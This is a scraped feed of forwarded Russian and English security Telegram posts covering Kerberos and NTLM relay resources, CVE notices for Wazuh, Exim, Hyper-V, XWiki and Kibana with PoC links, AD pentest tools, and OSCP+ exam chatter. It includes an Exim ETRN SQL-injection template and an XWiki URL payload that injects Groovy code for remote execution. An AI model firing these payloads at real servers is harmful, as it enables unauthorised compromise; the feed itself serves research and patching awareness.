Forwarded from RedTeam brazzers (Миша)
Всем привет!
Количество статей про Kerberos Relay увеличивается непропорционально слабо, в отличие от количества вопросов по этой теме. Поэтому я принял решение сделать небольшую карту, с помощью которой можно подобрать инструмент, подходящий именно вам, исходя из конкретной ситуации.
Карту в полном формате и с кликабельными ссылками можно найти тут:
https://github.com/CICADA8-Research/Penetration/tree/main/KrbRelay%20MindMap
Всем удачного понедельника 🙂
Количество статей про Kerberos Relay увеличивается непропорционально слабо, в отличие от количества вопросов по этой теме. Поэтому я принял решение сделать небольшую карту, с помощью которой можно подобрать инструмент, подходящий именно вам, исходя из конкретной ситуации.
Карту в полном формате и с кликабельными ссылками можно найти тут:
https://github.com/CICADA8-Research/Penetration/tree/main/KrbRelay%20MindMap
Всем удачного понедельника 🙂
Forwarded from APT
⚙️ Wazuh — Unsafe Deserialization RCE (CVE-2025-24016)
An unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.
🔗 Source:
https://github.com/0xjessie21/CVE-2025-24016
#wazuh #deserialization #rce #cve
An unsafe deserialization vulnerability in Wazuh servers allows remote code execution through unsanitized dictionary injection in DAPI requests/responses. If an attacker injects an unsanitized dictionary into a DAPI request or response, they can craft an unhandled exception, allowing arbitrary Python code execution.
🔗 Source:
https://github.com/0xjessie21/CVE-2025-24016
#wazuh #deserialization #rce #cve
Forwarded from SecuriXy.kz
Обнаружена SQLi уязвимость CVE-2025-26794 в #Exim версии 4.98 при использовании сериализации ETRN.
Для устранения проблемы рекомендуется обновиться до версии 4.98.1.
Подробности и эксплойт в контейнере доступны по ссылке https://github.com/OscarBataille/CVE-2025-26794
ETRN #',1); ## INSERT SQL HERE ## /*
Для устранения проблемы рекомендуется обновиться до версии 4.98.1.
Подробности и эксплойт в контейнере доступны по ссылке https://github.com/OscarBataille/CVE-2025-26794
Forwarded from s0ld13r ch. (s0ld13r)
Появился POC на свежую уязвимость CVE-2025-21333 💀
Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege - локальный юзер может повысить привилегии до SYSTEM на хосте с активным Hyper-V🔥
🔗 Repo: https://github.com/MrAle98/CVE-2025-21333-POC
P.S PoC не проверял
@s0ld13r_ch
Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege - локальный юзер может повысить привилегии до SYSTEM на хосте с активным Hyper-V
🔗 Repo: https://github.com/MrAle98/CVE-2025-21333-POC
P.S PoC не проверял
@s0ld13r_ch
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from SecuriXy.kz
В OpenSource платформе XWiki (https://www.xwiki.org/xwiki/bin/view/Main/WebHome) нашли #RCE CVE-2025-24893
PoC:
https://github.com/advisories/GHSA-rr6p-3pfg-562j
PoC:
<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20
https://github.com/advisories/GHSA-rr6p-3pfg-562j
Forwarded from SecuriXy.kz
Еще один SOC инструмент сдырявился следом за вазухом
🚨 Критическая уязвимость в #Kibana : ESA-2025-06 - В версиях от 8.15.0 до 8.17.2 обнаружена уязвимость, позволяющая выполнить произвольный код через Prototype Pollution. Эта уязвимость (CVE-2025-25012) имеет высокий уровень опасности с оценкой CVSS 9.9.
Кто подвержен риску?
В версиях 8.15.0–8.17.0: пользователи с ролью Viewer.
В версиях 8.17.1 и 8.17.2: пользователи с ролями, включающими привилегии fleet-all, integrations-all и actions:execute-advanced-connectors.
Рекомендуемые действия:
Обновитесь до версии Kibana 8.17.3.
Если обновление невозможно, добавьте в конфигурацию Kibana параметр:
🚨 Критическая уязвимость в #Kibana : ESA-2025-06 - В версиях от 8.15.0 до 8.17.2 обнаружена уязвимость, позволяющая выполнить произвольный код через Prototype Pollution. Эта уязвимость (CVE-2025-25012) имеет высокий уровень опасности с оценкой CVSS 9.9.
Кто подвержен риску?
В версиях 8.15.0–8.17.0: пользователи с ролью Viewer.
В версиях 8.17.1 и 8.17.2: пользователи с ролями, включающими привилегии fleet-all, integrations-all и actions:execute-advanced-connectors.
Рекомендуемые действия:
Обновитесь до версии Kibana 8.17.3.
Если обновление невозможно, добавьте в конфигурацию Kibana параметр:
xpack.integration_assistant.enabled: false
🤯1
Forwarded from Offensive Xwitter
😈 [ Mayfly @M4yFly ]
New Active Directory Mindmap v2025.03! 🚀
📖 Readable version:
🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🔧 Now fully generated from markdown files—way easier to update and maintain!
💡 Got improvements? PRs welcome! 👇
🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad
🐥 [ tweet ]
New Active Directory Mindmap v2025.03! 🚀
📖 Readable version:
🔗 https://orange-cyberdefense.github.io/ocd-mindmaps/img/mindmap_ad_dark_classic_2025.03.excalidraw.svg
🔧 Now fully generated from markdown files—way easier to update and maintain!
💡 Got improvements? PRs welcome! 👇
🔗 https://github.com/Orange-Cyberdefense/ocd-mindmaps/tree/main/excalimap/mindmap/ad
🐥 [ tweet ]
🔥1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
При эксплуатации уязвимостей ADCS могут возникать разные ошибки. В блоге подробно рассмотрены причины популярных ошибок, а также варианты решения этих проблем
https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/
#pentest #redteam #adcs
https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/
#pentest #redteam #adcs
❤2
В общем и целом это было не сказать бы что сложно.
Весь цикл от начала обучения до сдачи экзамен занял 3 месяца - при этом, времени на активное обучение было потрачено от силы 20-30 дней (праздники, проекты на работе, все дела).
Не хочу сильно вдаваться в подробности экзамена в этом посте, но я ещё не видел на просторах infosec-комьюнити пост/статьи о сдаче именно OSCP+ сертификата (а я, напомню, что под этот формат произошли небольшие изменения в процессе сдачи).
Исходя из этого, у меня к вам вопрос: хотите ли вы увидеть небольшую выписку (статей на хабре и так уже много) о моих впечатлениях от обучения/экзаменационного процесса и о формате сдачи экзамена в 2025 году?
Весь цикл от начала обучения до сдачи экзамен занял 3 месяца - при этом, времени на активное обучение было потрачено от силы 20-30 дней (праздники, проекты на работе, все дела).
Не хочу сильно вдаваться в подробности экзамена в этом посте, но я ещё не видел на просторах infosec-комьюнити пост/статьи о сдаче именно OSCP+ сертификата (а я, напомню, что под этот формат произошли небольшие изменения в процессе сдачи).
Исходя из этого, у меня к вам вопрос: хотите ли вы увидеть небольшую выписку (статей на хабре и так уже много) о моих впечатлениях от обучения/экзаменационного процесса и о формате сдачи экзамена в 2025 году?
Forwarded from AP Security
#soc
Свежие индикаторы компрометации: NTLM Relay Attack
Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.
Свежие индикаторы компрометации: NTLM Relay Attack
Текущая реализация атаки Shadow credentials во фреймворке Impacket, используемая, в частности, скриптом ntlmrelayx.py, содержит множество ошибок, оставляющих уникальные подписи на структурах данных NGC, записываемых злоумышленниками в LDAP-атрибут msDS-KeyCredentialLink. С помощью эвристики можно выявить большинство вредоносных ключей NGC, независимо от того, с помощью какого хакерского инструмента они были сгенерированы.
DSInternals
Indicator of Compromise: NTLM Relay Attack with Shadow Credentials
Updated in January 2026 to reflect changes in the behavior of domain controllers regarding the CUSTOMKEYINFO_FLAGS_MFA_NOT_USED flag. TL;DR The current implementation of the shadow credentials attack in the Impacket framework, most notably used by the ntlmrelayx.py…
👍1
Forwarded from 1N73LL1G3NC3
🍊 GoLAPS
Retrieve LAPS passwords from a domain. The tools is inspired in pyLAPS.
Blog: https://sensepost.com/blog/2025/golaps/
Retrieve LAPS passwords from a domain. The tools is inspired in pyLAPS.
Blog: https://sensepost.com/blog/2025/golaps/
🔥1
Forwarded from Пост Лукацкого
У BugBounty-платформы HackerOne утечка всех ее пользователей, включая пароли доступа к платформе 🔠 Так что, если вы пользователь этой платформы, то впору сменить свои реквизиты доступа к системе 🤒
Кстати, как вы думаете🤔 , что можно сделать, если узнать ваш пароль доступа к BugBounty-платформе? Узнать сумму ваших вознаграждения? Получить доступ ко всем вашим отчетам? Вывести все средства на подставные счета? 🤒 Что-то еще?
#утечка #bugbounty
Кстати, как вы думаете
#утечка #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
😁4
Forwarded from Cult Of Wire
Тут у Лукацкого появился пост, что HackerOne поломали, креды утекли и вообще всё пропало.
Однако, не всё так однозначно (на скрине).
Юзер забанен, тред удалён.
Однако, не всё так однозначно (на скрине).
Юзер забанен, тред удалён.
🦾 Обещанная статья на тему сдачи OSCP+ в 2025 году.
Что ждать на экзамене, как сейчас готовиться, что творится вообще!?
😼 Всё это я постарался ёмко описать в данном материале
🔗 Ссылка на статью в telegra.ph
Что ждать на экзамене, как сейчас готовиться, что творится вообще!?
😼 Всё это я постарался ёмко описать в данном материале
🔗 Ссылка на статью в telegra.ph
Telegraph
OSCP (PEN-200) - ГЛАЗА НЕ БОЯТСЯ, И РУКИ ДЕЛАЮТ!
Привет! Обещанная статья про сдачу OSCP не заставила себя долго ждать. Для многих (как и для меня) этот экзаменом является неким milestone на пути обучения пентесту, явно указывающим коллегам по цеху на то, что ты что-то знаешь, что-то умеешь, но до уровня…
❤8🔥6
Forwarded from true_security
нашел и решил написать про небольшую фичу в BitrixVM:
https://telegra.ph/bitrixvm-lpe-iz-korobki-02-21
https://telegra.ph/bitrixvm-lpe-iz-korobki-02-21
Telegraph
bitrixvm lpe из коробки
Слово bitrix уже как 3 года в переводе с молдаванского означает рукалицо. Сегодня расскажу вам про интересную фичу bitrixvm. Возможно кто то из вас с этим сталкивался, для меня это было новым. После получения доступа к серверу с bitrix мы обычно имеем права…
😁3
Как это выглядит / Как это ощущается
Мне определенно нужна парочка выходных после этой пролабы
🔥4😁2🤯1